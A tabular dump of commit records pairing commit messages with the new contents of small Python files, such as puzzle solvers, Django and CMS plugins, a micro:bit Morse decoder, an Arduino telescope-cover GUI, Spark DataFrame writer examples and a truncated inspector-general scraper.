commit stringlengths 40-40 | subject stringlengths 4-1.73k | repos stringlengths 5-127k | old_file stringlengths 2-751 | new_file stringlengths 2-751 | new_contents stringlengths 1-8.98k | old_contents stringlengths 0-6.59k | license stringclasses 13 values | lang stringclasses 23 values
---|---|---|---|---|---|---|---|---
7b949393c0cf20b9f21ff3e743a6ad35b3cccb49 | Create 22.py | imylyanyk/AdventOfCode | 22.py | 22.py | import copy
import math
# [ 0 | 1 | 2 | 3 | 4 | 5 ]
#spell = [spell id | mana cost | damage | heal | mana recharge | timer]
spells = [(0, 53, 4, 0, 0, 0), (1, 73, 2, 2, 0, 0), (2, 113, 0, 0, 0, 6), (3, 173, 3, 0, 0, 6), (4, 229, 0, 0, 101, 5)]
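#spell ids: 0 = Magic Missile, 1 = Drain, 2 = Shield, 3 = Poison, 4 = Recharge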
#2 = Shield
#timer = [spell id, turns left]
bossDamage = 9
Inf = 100000
best = Inf
def minManaToWin(me, boss, mana, manaUsed, timers, myMove):
#print(me, boss, mana, manaUsed, timers, myMove)
global spells, bossDamage, Inf, best
if me > 0 and boss <= 0:
#win
print(manaUsed)
best = min(best, manaUsed)
return 0
if me <= 0:
return Inf
if manaUsed > best:
return Inf
if myMove:
me -= 1
if me <= 0:
return Inf
#apply timers
shieldOn = False
new_timers = []
for timer in timers:
if timer[0] == 2:
shieldOn = True
spell = spells[timer[0]]
mana += spell[4]
me += spell[3]
boss -= spell[2]
if timer[1] > 1:
new_timers += [[timer[0], timer[1] - 1]]
if me > 0 and boss <= 0:
#win
print(manaUsed)
best = min(best, manaUsed)
return 0
res = Inf
if myMove:
for spell in spells:
if spell[1] <= mana:
if spell[5] == 0:
#immediately
tmp = minManaToWin(me + spell[3], boss - spell[2], mana - spell[1], manaUsed + spell[1], new_timers, False)
res = min(res, tmp + spell[1])
else:
inUse = False
for t in new_timers:
if t[0] == spell[0]:
#already applied spell
inUse = True
break
if inUse:
continue
#add timer
tmp = minManaToWin(me, boss, mana - spell[1], manaUsed + spell[1], new_timers + [[spell[0], spell[5]]], False)
res = min(res, tmp + spell[1])
else:
#boss' move
myArmor = 7 if shieldOn else 0
me -= bossDamage - myArmor
tmp = minManaToWin(me, boss, mana, manaUsed, new_timers, True)
res = min(res, tmp)
return res
result = minManaToWin(50, 51, 500, 0, [], True)
print ('res =', result)
| mit | Python |
|
62237000f3ae92638214d96f323a81d6a492d9cd | Update existing FAs with current tier programs (#4829) | mitodl/micromasters,mitodl/micromasters,mitodl/micromasters,mitodl/micromasters | financialaid/management/commands/migrate_finaid_program_tiers.py | financialaid/management/commands/migrate_finaid_program_tiers.py | """
Update FinancialAid objects with current tier program
"""
from django.core.management import BaseCommand, CommandError
from financialaid.models import FinancialAid, TierProgram
class Command(BaseCommand):
"""
Updates the existing financial aid objects to current tier programs
"""
help = "Updates the existing financial aid objects to current tier programs"
def handle(self, *args, **kwargs): # pylint: disable=unused-argument
fin_aids = FinancialAid.objects.filter(
tier_program__current=False,
)
updated_count = 0
for financial_aid in fin_aids:
try:
threshold = financial_aid.tier_program.income_threshold
tier_program = TierProgram.objects.get(
income_threshold=threshold,
current=True,
)
except TierProgram.DoesNotExist:
raise CommandError(
'Could not find a current tier program with threshold "{}" for financial aid {}'.format(
threshold,
financial_aid.id
)
)
except TierProgram.MultipleObjectsReturned:
raise CommandError(
'There are multiple tier programs with threshold "{}"'.format(threshold)
)
financial_aid.tier_program = tier_program
financial_aid.save_and_log(None)
updated_count += 1
self.stdout.write(self.style.SUCCESS('Updated {} financial aid instances'.format(updated_count)))
| bsd-3-clause | Python |
|
57af6d6d8b4c67f7b437f512e4d8eb4ea66a20f9 | Add morse script | OiNutter/microbit-scripts | morse/morse.py | morse/morse.py | # Import modules
from microbit import *
# define morse code dictionary
morse = {
"a": ".-",
"b": "-...",
"c": "-.-.",
"d": "-..",
"e": ".",
"f": "..-.",
"s": "...",
"o": "---",
"m": "--",
"1": ".----",
"2": "..---",
"3": "...--",
"4": "....-",
"5": ".....",
"6": "-....",
"7:" "--...",
"8": "---..",
"9": "----.",
"0": "-----"
}
current_letter = ""
pressed = 0
paused = 0
letters = []
def detect_dot_dash(time_pressed):
return "." if time_pressed <= 50 else "-"
def get_letter(code):
global morse
for key,value in morse.items():
if code == value:
return key
return ""
while True:
sleep(1) # do not use all the cpu power
# make a loop to test for the button being pressed
if button_a.is_pressed():
if paused >= 100:
letters.append(get_letter(current_letter))
current_letter = ""
if paused >= 200:
letters.append("_")
paused = 0
pressed = 1
while button_a.is_pressed():
# wait until the button is not pressed any more
sleep(1) # do not use all the cpu power
pressed += 1
# measure the time
current_letter += detect_dot_dash(pressed)
paused = 1
else:
if paused > 0:
paused +=1
if button_b.is_pressed() or accelerometer.current_gesture() == "shake":
letters.append(get_letter(current_letter))
display.scroll("".join(letters))
paused = 0
pressed = 0
current_letter = ""
letters = []
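# Timing summary (in loop ticks, as implemented above): a press <= 50 ticks is a
# dot, longer is a dash; a pause >= 100 closes the current letter, and a pause
# >= 200 also inserts a "_" word separator. Button B or a shake flushes the
# buffer and scrolls the decoded message.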
| mit | Python |
|
9609529e3a5c25c37be342d2bd1efe33e25128ff | Add IO file | ion201/thermopi,ion201/thermopi,ion201/thermopi,ion201/thermopi | IO.py | IO.py | import RPi.GPIO as GPIO
def gettemp():
return 80
def setfan(state):
pass
def setac(state):
if state:
# Always turn on the fan when the ac is on
setfan(True) | mit | Python |
|
47fffb67871325f1b12d6150f12b2d9c44984837 | implement top contributors functionality in gitguard | cs3219-team6/assignment-5 | gitguard.py | gitguard.py | import re
import subprocess
import github
"""
gitguard_extractor.py
Extracts data for the visualizer.
repo_link is in the format USER/REPO_NAME or ORGANIZATION/REPO_NAME
"""
REGEX_REPO_LINK_DELIMITER = '\s*/\s*'
def process_repo_link(repo_link):
#returns owner, repo_name
return re.compile(REGEX_REPO_LINK_DELIMITER).split(repo_link)
def get_top_contributor(repo_link):
return get_top_n_contributors(repo_link, 1)
def get_top_n_contributors(repo_link, n):
owner, repo = process_repo_link(repo_link)
# connect to github API
gh = github.GitHub()
contributors = gh.repos(owner)(repo).contributors.get()
answer = ''
persons = 0
for contributor in contributors:
answer += '%5d %s\n' % (contributor['contributions'], contributor['login'])
persons += 1
# only show top n contributors
if persons >= n:
break
answer += '\nTop contributors for %s!' % repo_link
return answer
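# Usage sketch (hypothetical repo link; needs network access to the GitHub API):
# print(get_top_n_contributors('cs3219-team6/assignment-5', 3))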
| mit | Python |
|
a9fa88d11f5338f8662d4d6e7dc2103a80144be0 | Revert "Remove model" | shymonk/django-datatable,arambadk/django-datatable,arambadk/django-datatable,shymonk/django-datatable,arambadk/django-datatable,shymonk/django-datatable | table/models.py | table/models.py | from django.db import models
# Create your models here.
| mit | Python |
|
c821be39a3853bf8a14e8c4089904dfe633ad276 | Solve task #412 | Zmiecer/leetcode,Zmiecer/leetcode | 412.py | 412.py | class Solution(object):
def fizzBuzz(self, n):
"""
:type n: int
:rtype: List[str]
"""
def fizzBuzz(i, x):
return {1: str(i), 3: "Fizz", 5: "Buzz", 15: "FizzBuzz"}[x]
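# x accumulates the product of the divisors that divide i (so it ends up as
# 1, 3, 5, or 15), which indexes directly into the dict above.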
ans = []
x = 1
for i in range(1, n + 1):
if i % 3 == 0:
x *= 3
if i % 5 == 0:
x *= 5
ans.append(fizzBuzz(i, x))
x = 1
return ans
| mit | Python |
|
e51322e7ee4afabee8b98137bc5e56b0a0f803ec | Solve #461 | Zmiecer/leetcode,Zmiecer/leetcode | 461.py | 461.py | class Solution(object):
def hammingDistance(self, x, y):
"""
:type x: int
:type y: int
:rtype: int
"""
x, y = list(bin(x)[2:]), list(bin(y)[2:])
s1 = list('0' * max(len(x), len(y)))
s2 = list('0' * max(len(x), len(y)))
s1[len(s1) - len(x):] = x
s2[len(s2) - len(y):] = y
k = 0
for i in range(len(s1)):
if s1[i] != s2[i]:
k += 1
return k
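# Equivalent one-liner, shown here as an alternative sketch:
# return bin(x ^ y).count('1')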
| mit | Python |
|
2206f2dac5cb15c10fa59f14597133b6a0d3a314 | Create ALE.py | 4dsolutions/async_learning_engine | ALE.py | ALE.py | """
Asynchronous Learning Engine (ALE)
Supports PWS standard desktop (studio)
Mentor Queues
Load Balancing / Air Traffic Control
Courses / Flights
A mentor queue is a worker queue with
tasks pending, in process, complete.
The many subclasses of Task are only hinted
at in this overview.
Example Tasks (Transactions archiving to Chronofile):
Set start time on booked flight, notify students
Take Off
In-flight Services (the learning experience)
Land
Postmortem **/ Archive Stats
** sounds dire and we do try experimental courses
sometimes that "crash" but in this shoptalk it's
how we discuss any completed flight.
In-flight the students have a Call Bell for
special services. We run "shows" which in the
better schools are highly interactive and require
a lot of student activity. Passivism is a killer
when it comes to building confidence and competence
in one's tools, as Scott Gray would point out during
faculty meetings.
A normal / standard flight consists of working
through course materials in a PWS Studio with
asynchronous feedback from one or more mentors.
The "flight" (course) is also a unit of accounting
i.e. we containerize it in terms of fixed cost
overhead, tuition, compensation and so on. See
workflow diagrams.
ALE:
In the OO version, ALE is the root object, adding mixins as needed
Kirby Urner
Want graphics?
https://www.flickr.com/photos/kirbyurner/sets/72157654417641521
"""
class ALE:
pass
class Oasis:
pass # stub for the example mixin referenced below, so the module loads
class AWS(ALE):
pass # stub base for Passenger; possibly intended to be ALE
class Flight(ALE):
pass
class AirTrafficUtils(ALE):
pass
class Passenger(AWS):
pass
class PWS:
pass
class Dispatcher(AirTrafficUtils):
pass
class Student(Passenger):
pass
class Task:
# Examples: Start Class, Submit Work, Annotate Materials, Return Work
pass
class Mentor(Oasis): # Example mixin (ways to "phone home")
pass
class Course(Flight): # Expense Unit for accounting / bookkeeping
pass
class Oversight(ALE):
pass
class Admin(Oversight):
pass
class Recruiting(Mentor):
pass # Exhibited Mentors, free samples
class StudentSupport(Oversight):
pass # guidance functions ("Travel Agency")
| apache-2.0 | Python |
|
2e2a8f24cc8fc7e1614bf12a0d6d42c70d1efcf8 | Create GUI.py | kellogg76/ArduinoTelescopeDustCover | GUI.py | GUI.py | #!/usr/bin/python
from Tkinter import *
root = Tk()
root.title("Elentirmo Observatory Controller v0.1")
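# Serial protocol (single-byte commands sent to the Arduino, as used below):
# 'O' = open dust cover, 'C' = close cover, 'F' = flat box on, 'Q' = flat box off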
dust_cover_text = StringVar()
dust_cover_text.set('Cover Closed')
flat_box_text = StringVar()
flat_box_text.set('Flat Box Off')
def dust_cover_open():
print "Opening"
## Open a serial connection with Arduino.
import time
import serial
ser = serial.Serial("COM9", 9600) # Open serial port that Arduino is using
time.sleep(3) # Wait 3 seconds for Arduino to reset
print ser # Print serial config
print "Sending serial command to OPEN the dust cover."
ser.write("O")
print "Opening serial connection."
ser.close()
# Reminder to close the connection when finished
if(ser.isOpen()):
print "Serial connection is still open."
dust_cover_label.config(bg="Green")
dust_cover_text.set('Cover is Open')
def dust_cover_close():
print "Closing"
## Open a serial connection with Arduino.
import time
import serial
ser = serial.Serial("COM9", 9600) # Open serial port that Arduino is using
time.sleep(3) # Wait 3 seconds for Arduino to reset
print ser # Print serial config
print "Sending serial command to CLOSE the dust cover."
ser.write("C")
print "Closing serial connection."
ser.close()
# Reminder to close the connection when finished
if(ser.isOpen()):
print "Serial connection is still open."
dust_cover_label.config(bg="red")
dust_cover_text.set('Cover is closed')
def flat_on():
print "Activating flat box"
## Open a serial connection with Arduino.
import time
import serial
ser = serial.Serial("COM9", 9600) # Open serial port that Arduino is using
time.sleep(3) # Wait 3 seconds for Arduino to reset
print ser # Print serial config
print "Sending serial command to turn on the flat box via relay."
ser.write("F")
print "Opening serial connection."
ser.close()
# Reminder to close the connection when finished
if(ser.isOpen()):
print "Serial connection is still open."
flat_box_label.config(bg="Green")
flat_box_text.set('Flat Box on')
def flat_off():
print "Dectivating flat box"
## Open a serial connection with Arduino.
import time
import serial
ser = serial.Serial("COM9", 9600) # Open serial port that Arduino is using
time.sleep(3) # Wait 3 seconds for Arduino to reset
print ser # Print serial config
print "Sending serial command to turn off the flat box via relay."
ser.write("Q")
print "Opening serial connection."
ser.close()
# Reminder to close the connection when finished
if(ser.isOpen()):
print "Serial connection is still open."
flat_box_label.config(bg="red")
flat_box_text.set('Flat Box Off')
open_dust_cover_btn = Button(text=" Open Cover ", width=15, command=dust_cover_open)
open_dust_cover_btn.grid(row=0, column=0)
close_dust_cover_btn = Button(text=" Close Cover ", width=15, command=dust_cover_close)
close_dust_cover_btn.grid(row=1, column=0)
flat_box_on_btn = Button(text="Turn On Light", width=15, command=flat_on)
flat_box_on_btn.grid(row=0, column=2)
flat_box_off_btn = Button(text="Turn Off Light", width=15, command=flat_off)
flat_box_off_btn.grid(row=1, column=2)
status_label = Label(root, text=("Current Status"), width=15, fg="Black")
status_label.grid(row=2, column=1)
dust_cover_label = Label(root, textvariable=dust_cover_text, width=15, fg="Black", bg="Red")
dust_cover_label.grid(row=2, column=0)
flat_box_label = Label(root, textvariable=flat_box_text, width=15, fg="Black", bg="Red")
flat_box_label.grid(row=2, column=2)
root.mainloop()
| mit | Python |
|
6be70d01bdf58389db2a6adc4035f82669d02a61 | Allow use of GoogleMaps plugin without Multilingual support | cyberintruder/django-cms,chmberl/django-cms,owers19856/django-cms,jproffitt/django-cms,vstoykov/django-cms,MagicSolutions/django-cms,isotoma/django-cms,jproffitt/django-cms,chkir/django-cms,stefanw/django-cms,jeffreylu9/django-cms,divio/django-cms,Vegasvikk/django-cms,jrief/django-cms,pbs/django-cms,farhaadila/django-cms,chrisglass/django-cms,kk9599/django-cms,nimbis/django-cms,rsalmaso/django-cms,vad/django-cms,rscnt/django-cms,memnonila/django-cms,intip/django-cms,MagicSolutions/django-cms,stefanfoulis/django-cms,jrclaramunt/django-cms,SinnerSchraderMobileMirrors/django-cms,selecsosi/django-cms,donce/django-cms,liuyisiyisi/django-cms,jeffreylu9/django-cms,pbs/django-cms,liuyisiyisi/django-cms,jrclaramunt/django-cms,divio/django-cms,stefanfoulis/django-cms,astagi/django-cms,datakortet/django-cms,intip/django-cms,DylannCordel/django-cms,frnhr/django-cms,adaptivelogic/django-cms,stefanw/django-cms,qnub/django-cms,timgraham/django-cms,stefanw/django-cms,memnonila/django-cms,mkoistinen/django-cms,jeffreylu9/django-cms,vad/django-cms,AlexProfi/django-cms,intgr/django-cms,ojii/django-cms,sephii/django-cms,philippze/django-cms,rscnt/django-cms,kk9599/django-cms,pbs/django-cms,jsma/django-cms,astagi/django-cms,rscnt/django-cms,czpython/django-cms,jeffreylu9/django-cms,foobacca/django-cms,foobacca/django-cms,selecsosi/django-cms,donce/django-cms,SinnerSchraderMobileMirrors/django-cms,SachaMPS/django-cms,chkir/django-cms,11craft/django-cms,youprofit/django-cms,petecummings/django-cms,wyg3958/django-cms,frnhr/django-cms,foobacca/django-cms,pixbuffer/django-cms,datakortet/django-cms,vxsx/django-cms,datakortet/django-cms,driesdesmet/django-cms,bittner/django-cms,astagi/django-cms,netzkolchose/django-cms,owers19856/django-cms,netzkolchose/django-cms,wuzhihui1123/django-cms,wyg3958/django-cms,cyberintruder/django-cms,SofiaReis/django-cms,benzkji/django-cms,nimbis/django-cms,rryan/django-cms,takeshineshiro/django-cms,robmagee/django-cms,FinalAngel/django-cms,nostalgiaz/django-cms,andyzsf/django-cms,frnhr/django-cms,adaptivelogic/django-cms,dhorelik/django-cms,iddqd1/django-cms,jsma/django-cms,frnhr/django-cms,11craft/django-cms,saintbird/django-cms,adaptivelogic/django-cms,memnonila/django-cms,jrief/django-cms,pbs/django-cms,takeshineshiro/django-cms,MagicSolutions/django-cms,Vegasvikk/django-cms,evildmp/django-cms,AlexProfi/django-cms,jsma/django-cms,divio/django-cms,rsalmaso/django-cms,isotoma/django-cms,petecummings/django-cms,vxsx/django-cms,Livefyre/django-cms,11craft/django-cms,liuyisiyisi/django-cms,jalaziz/django-cms-grappelli-old,keimlink/django-cms,czpython/django-cms,keimlink/django-cms,stefanfoulis/django-cms,petecummings/django-cms,takeshineshiro/django-cms,ScholzVolkmer/django-cms,timgraham/django-cms,chkir/django-cms,foobacca/django-cms,stefanw/django-cms,jalaziz/django-cms-grappelli-old,rryan/django-cms,ScholzVolkmer/django-cms,qnub/django-cms,benzkji/django-cms,ScholzVolkmer/django-cms,kk9599/django-cms,nimbis/django-cms,webu/django-cms,nostalgiaz/django-cms,nostalgiaz/django-cms,vad/django-cms,mkoistinen/django-cms,selecsosi/django-cms,jsma/django-cms,keimlink/django-cms,timgraham/django-cms,yakky/django-cms,isotoma/django-cms,vxsx/django-cms,jrclaramunt/django-cms,intgr/django-cms,pancentric/django-cms,sznekol/django-cms,pixbuffer/django-cms,leture/django-cms,mkoistinen/django-cms,irudayarajisawa/django-cms,czpython/django-cms,intip/django-cms,Jaccorot/django-cms,sephii/django-cms,ir
udayarajisawa/django-cms,jproffitt/django-cms,wuzhihui1123/django-cms,vstoykov/django-cms,rsalmaso/django-cms,farhaadila/django-cms,vad/django-cms,SofiaReis/django-cms,360youlun/django-cms,DylannCordel/django-cms,intgr/django-cms,jrief/django-cms,leture/django-cms,SofiaReis/django-cms,yakky/django-cms,Vegasvikk/django-cms,owers19856/django-cms,mkoistinen/django-cms,saintbird/django-cms,yakky/django-cms,jrief/django-cms,robmagee/django-cms,pixbuffer/django-cms,philippze/django-cms,saintbird/django-cms,ojii/django-cms,360youlun/django-cms,webu/django-cms,sznekol/django-cms,dhorelik/django-cms,wuzhihui1123/django-cms,evildmp/django-cms,yakky/django-cms,Livefyre/django-cms,netzkolchose/django-cms,josjevv/django-cms,bittner/django-cms,rryan/django-cms,SmithsonianEnterprises/django-cms,evildmp/django-cms,farhaadila/django-cms,nimbis/django-cms,sznekol/django-cms,ojii/django-cms,sephii/django-cms,Livefyre/django-cms,rryan/django-cms,FinalAngel/django-cms,jalaziz/django-cms-grappelli-old,FinalAngel/django-cms,bittner/django-cms,SachaMPS/django-cms,webu/django-cms,pancentric/django-cms,driesdesmet/django-cms,benzkji/django-cms,divio/django-cms,isotoma/django-cms,VillageAlliance/django-cms,iddqd1/django-cms,intip/django-cms,evildmp/django-cms,chrisglass/django-cms,benzkji/django-cms,360youlun/django-cms,sephii/django-cms,pancentric/django-cms,datakortet/django-cms,dhorelik/django-cms,cyberintruder/django-cms,andyzsf/django-cms,iddqd1/django-cms,andyzsf/django-cms,SachaMPS/django-cms,czpython/django-cms,nostalgiaz/django-cms,robmagee/django-cms,vstoykov/django-cms,chmberl/django-cms,philippze/django-cms,wyg3958/django-cms,intgr/django-cms,andyzsf/django-cms,leture/django-cms,chmberl/django-cms,vxsx/django-cms,Livefyre/django-cms,FinalAngel/django-cms,DylannCordel/django-cms,josjevv/django-cms,11craft/django-cms,jproffitt/django-cms,selecsosi/django-cms,irudayarajisawa/django-cms,youprofit/django-cms,VillageAlliance/django-cms,rsalmaso/django-cms,netzkolchose/django-cms,SinnerSchraderMobileMirrors/django-cms,bittner/django-cms,VillageAlliance/django-cms,Jaccorot/django-cms,driesdesmet/django-cms,SmithsonianEnterprises/django-cms,donce/django-cms,youprofit/django-cms,AlexProfi/django-cms,wuzhihui1123/django-cms,qnub/django-cms,stefanfoulis/django-cms,Jaccorot/django-cms,josjevv/django-cms,SmithsonianEnterprises/django-cms | cms/plugins/googlemap/cms_plugins.py | cms/plugins/googlemap/cms_plugins.py | from django.conf import settings
from cms.plugin_pool import plugin_pool
from cms.plugin_base import CMSPluginBase
from django.utils.translation import ugettext_lazy as _
from cms.plugins.googlemap.models import GoogleMap
from cms.plugins.googlemap.settings import GOOGLE_MAPS_API_KEY
from django.forms.widgets import Media
class GoogleMapPlugin(CMSPluginBase):
model = GoogleMap
name = _("Google Map")
render_template = "cms/plugins/googlemap.html"
def render(self, context, instance, placeholder):
context.update({
'object':instance,
'placeholder':placeholder,
})
return context
def get_plugin_media(self, request, context, plugin):
if 'GOOGLE_MAPS_API_KEY' in context:
key = context['GOOGLE_MAPS_API_KEY']
else:
key = GOOGLE_MAPS_API_KEY
lang = getattr(request, 'LANGUAGE_CODE', settings.LANGUAGE_CODE[0:2])
return Media(js = ('http://maps.google.com/maps?file=api&v=2&key=%s&hl=%s' % (key, lang),))
plugin_pool.register_plugin(GoogleMapPlugin) | from cms.plugin_pool import plugin_pool
from cms.plugin_base import CMSPluginBase
from django.utils.translation import ugettext_lazy as _
from cms.plugins.googlemap.models import GoogleMap
from cms.plugins.googlemap.settings import GOOGLE_MAPS_API_KEY
from cms.plugins.googlemap import settings
from django.forms.widgets import Media
class GoogleMapPlugin(CMSPluginBase):
model = GoogleMap
name = _("Google Map")
render_template = "cms/plugins/googlemap.html"
def render(self, context, instance, placeholder):
context.update({
'object':instance,
'placeholder':placeholder,
})
return context
def get_plugin_media(self, request, context, plugin):
if 'GOOGLE_MAPS_API_KEY' in context:
key = context['GOOGLE_MAPS_API_KEY']
else:
key = GOOGLE_MAPS_API_KEY
return Media(js = ('http://maps.google.com/maps?file=api&v=2&key=%s&hl=%s' % (key, request.LANGUAGE_CODE),))
plugin_pool.register_plugin(GoogleMapPlugin) | bsd-3-clause | Python |
5c952e7a54bcff7bcdbd3b2a2d85f1f93ce95242 | add first test: config+store | icing/mod_md,icing/mod_md,icing/mod_md,icing/mod_md,icing/mod_md | test/test_1100_conf_store.py | test/test_1100_conf_store.py | # test mod_md basic configurations
import os.path
import pytest
import re
import subprocess
import sys
import time
from ConfigParser import SafeConfigParser
from datetime import datetime
from httplib import HTTPConnection
from testbase import TestEnv
config = SafeConfigParser()
config.read('test.ini')
PREFIX = config.get('global', 'prefix')
def setup_module(module):
print("setup_module module:%s" % module.__name__)
TestEnv.init()
TestEnv.apache_err_reset()
TestEnv.APACHE_CONF_SRC = "test_configs_data"
status = TestEnv.apachectl(None, "start")
assert status == 0
def teardown_module(module):
print("teardown_module module:%s" % module.__name__)
status = TestEnv.apachectl(None, "stop")
class TestConf:
def setup_method(self, method):
print("setup_method: %s" % method.__name__)
(self.errors, self.warnings) = TestEnv.apache_err_count()
TestEnv.clear_store()
def teardown_method(self, method):
print("teardown_method: %s" % method.__name__)
# --------- add to store ---------
@pytest.mark.parametrize("confFile,dnsLists", [
("test_001", [["example.org", "www.example.org", "mail.example.org"]]),
("test_002", [["example.org", "www.example.org", "mail.example.org"], ["example2.org", "www.example2.org", "mail.example2.org"]])
])
def test_001(self, confFile, dnsLists):
# just one ManagedDomain definition
assert TestEnv.apachectl(confFile, "graceful") == 0
assert TestEnv.is_live(TestEnv.HTTPD_URL, 1)
for i in range (0, len(dnsLists)):
self._check_md(dnsLists[i][0], dnsLists[i], 1)
# --------- _utils_ ---------
def _new_errors(self):
(errors, warnings) = TestEnv.apache_err_count()
return errors - self.errors
def _new_warnings(self):
(errors, warnings) = TestEnv.apache_err_count()
return warnings - self.warnings
def _check_md(self, name, dnsList, state):
jout = TestEnv.a2md(["list"])['jout']
assert jout
output = jout['output']
mdFound = False
for i in range (0, len(output)):
md = output[i]
if name == md['name']:
mdFound = True
assert md['domains'] == dnsList
assert md['state'] == state
assert mdFound == True | apache-2.0 | Python |
|
c15c4a663c257cad6763cf92c50b7ad706017c74 | Remove extraneous imports in the base view package | eskwire/evesrp,eskwire/evesrp,paxswill/evesrp,eskwire/evesrp,paxswill/evesrp,paxswill/evesrp,eskwire/evesrp | evesrp/views/__init__.py | evesrp/views/__init__.py | from flask import render_template
from flask.ext.login import login_required
from .. import app
@app.route('/')
@login_required
def index():
return render_template('base.html')
| from collections import OrderedDict
from urllib.parse import urlparse
import re
from flask import render_template, redirect, url_for, request, abort, jsonify,\
flash, Markup, session
from flask.views import View
from flask.ext.login import login_user, login_required, logout_user, \
current_user
from flask.ext.wtf import Form
from flask.ext.principal import identity_changed, AnonymousIdentity
from sqlalchemy.orm.exc import NoResultFound
from wtforms.fields import StringField, PasswordField, SelectField, \
SubmitField, TextAreaField, HiddenField
from wtforms.fields.html5 import URLField, DecimalField
from wtforms.widgets import HiddenInput
from wtforms.validators import InputRequired, ValidationError, AnyOf, URL
from .. import app, auth_methods, db, requests_session, killmail_sources
from ..auth import SubmitRequestsPermission, ReviewRequestsPermission, \
PayoutRequestsPermission, admin_permission
from ..auth.models import User, Group, Division, Pilot
from ..models import Request, Modifier, Action
@app.route('/')
@login_required
def index():
return render_template('base.html')
| bsd-2-clause | Python |
d40b4c250f7d1c0c6a6c198b3e1ea69e0049830e | Create syb.py | supersonictw/syb | syb.py | syb.py | # -*- coding: utf-8 -*-
"""
Star Yuuki Bot
~~~~~~~~~~~
LineClient for sending and receiving messages from the LINE server.
Copyright: (c) 2015 SuperSonic Software Foundation and Star Inc.
Website:
SuperSonic Software Foundation: http://supersonic-org.cf
Star Inc.: http://startw.cf
License: Mozilla Public License 2.0
"""
print "Come Soon..."
| mpl-2.0 | Python |
|
774877893b9f94711b717d01b896deefe65eb211 | create file | jbelgamazzi/recomendacao_semantica | app.py | app.py | """
Uses the external rdflib library to parse JSON-LD data and run a SPARQL query.
"""
import rdflib
jsonldData = open("LearningObjectsExpanded.jsonld").read()
queryData = open("findRecommendations.query").read()
graph = rdflib.Graph()
graph.parse(data=jsonldData,format='json-ld')
results = graph.query(queryData)
for result in results:
print(result)
| mit | Python |
|
921221e4ad7d74b6f9d8b0b75417fe84fd01715f | Add script to concatenate all titers to one file tracking source/passage Fixes #76 | blab/nextstrain-db,blab/nextstrain-db,nextstrain/fauna,nextstrain/fauna | tdb/concatenate.py | tdb/concatenate.py | import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--files', nargs='*', default=[], help="tsvs that will be concatenated")
parser.add_argument('-o', '--output', type=str, default="data/titers_complete.tsv")
def concat(files,out):
with open(out, 'w') as o:
for filename in files:
print "Concatenating and annotating %s into %s." % (filename, out)
if "cdc" in filename.lower():
source = "cdc"
elif "crick" in filename.lower():
source = "crick"
else:
source = "none"
if "egg" in filename.lower():
passage = "egg"
elif "cell" in filename.lower():
passage = "egg"
else:
passage = "none"
with open(filename, 'r') as f:
for line in f.readlines():
print line
line = line.strip()
l = "%s\t%s\t%s\n" % (line, source, passage)
o.write(l)
if __name__=="__main__":
args = parser.parse_args()
concat(args.files, args.output)
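# Example invocation (hypothetical filenames; source and passage are inferred
# from the names, e.g. "cdc"/"crick" and "egg"/"cell"):
# python concatenate.py -f data/cdc_egg_titers.tsv data/crick_cell_titers.tsv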
| agpl-3.0 | Python |
|
c26d570e949483224b694574120e37a215dcc348 | Add dataframewriter api example to python graphene (#4520) | intel-analytics/analytics-zoo,intel-analytics/analytics-zoo,intel-analytics/analytics-zoo | ppml/trusted-big-data-ml/python/docker-graphene/examples/sql_dataframe_writer_example.py | ppml/trusted-big-data-ml/python/docker-graphene/examples/sql_dataframe_writer_example.py | from pyspark.sql.functions import *
from pyspark.sql import Row, Window, SparkSession, SQLContext
from pyspark.sql.types import IntegerType, FloatType, StringType
from pyspark.sql import functions as F
from pyspark.sql.functions import rank, min, col, mean
import random
import os
import tempfile
def sql_dataframe_writer_api(spark):
print("Start running dataframe writer API")
sc = spark.sparkContext
sqlContext = SQLContext(sc)
df = spark.createDataFrame([(2, "Alice"), (5, "Bob")], ["age", "name"])
# bucketBy and saveAsTable
# make sure that there is no work/spark-warehouse/bucketed_table/ under the current path
df.write.format('parquet').bucketBy(100, 'age', 'name').mode("overwrite").saveAsTable('bucketed_table', path="work/spark-warehouse/bucketed_table/")
print("bucketBy and saveAsTable API finished")
# csv and option
df = spark.createDataFrame([(2, "Alice"), (5, "Bob")], ["age", "name"])
df.write.option('header','true').csv(os.path.join(tempfile.mkdtemp(), 'data'))
print("csv and option API finished")
# format
df.write.format('json').save(os.path.join(tempfile.mkdtemp(), 'data'))
print("format API finished")
# insertInto
df2 = spark.createDataFrame([(3, "Alice")], ["age", "name"])
df2.write.insertInto("bucketed_table")
print("insertInto API finished")
# jdbc
# json
df.write.json(os.path.join(tempfile.mkdtemp(), 'data'))
print("json API finished")
# mode
df.write.mode('append').parquet(os.path.join(tempfile.mkdtemp(), 'data'))
print("mode API finished")
# orc
orc_df = spark.read.orc('/ppml/trusted-big-data-ml/work/spark-2.4.6/python/test_support/sql/orc_partitioned')
orc_df.write.orc(os.path.join(tempfile.mkdtemp(), 'data'))
print("orc API finished")
# parquet
df.write.parquet(os.path.join(tempfile.mkdtemp(), 'data'))
print("parquet API finished")
# partitionBy
df.write.partitionBy('age').parquet(os.path.join(tempfile.mkdtemp(), 'data'))
print("partitionBy API finished")
# save
df.write.mode("append").save(os.path.join(tempfile.mkdtemp(), 'data'))
print("save API finished")
# sortBy
# make sure that there is no work/spark-warehouse/sorted_bucketed_table/ under the current path
df.write.format('parquet').bucketBy(100, 'name').sortBy('age').mode("overwrite").saveAsTable('sorted_bucketed_table', path="work/spark-warehouse/sorted_bucketed_table/")
print("sortBy API finished")
# text
df = spark.createDataFrame([1.0, 2.0, 3.0], StringType())
df.write.text(os.path.join(tempfile.mkdtemp(), 'data'))
print("text API finished")
print("Finish running dataframe writer API")
if __name__ == "__main__":
spark = SparkSession \
.builder \
.appName("Python Spark SQL Dataframe Writer example") \
.config("spark.some.config.option", "some-value") \
.getOrCreate()
sql_dataframe_writer_api(spark)
| apache-2.0 | Python |
|
ad489edc8059b75d9ec78d0aeb03ac3592b93923 | Add Federal Labor Relations Authority. | lukerosiak/inspectors-general,divergentdave/inspectors-general | inspectors/flra.py | inspectors/flra.py | #!/usr/bin/env python
import datetime
import logging
import os
from urllib.parse import urljoin
from bs4 import BeautifulSoup
from utils import utils, inspector
# https://www.flra.gov/OIG
# Oldest report: 1999
# options:
# standard since/year options for a year range to fetch from.
#
# Notes for IG's web team:
#
AUDIT_REPORTS_URL = "https://www.flra.gov/IG_audit-reports"
INTERNAL_REVIEWS_URL = "https://www.flra.gov/IG_internal-reviews"
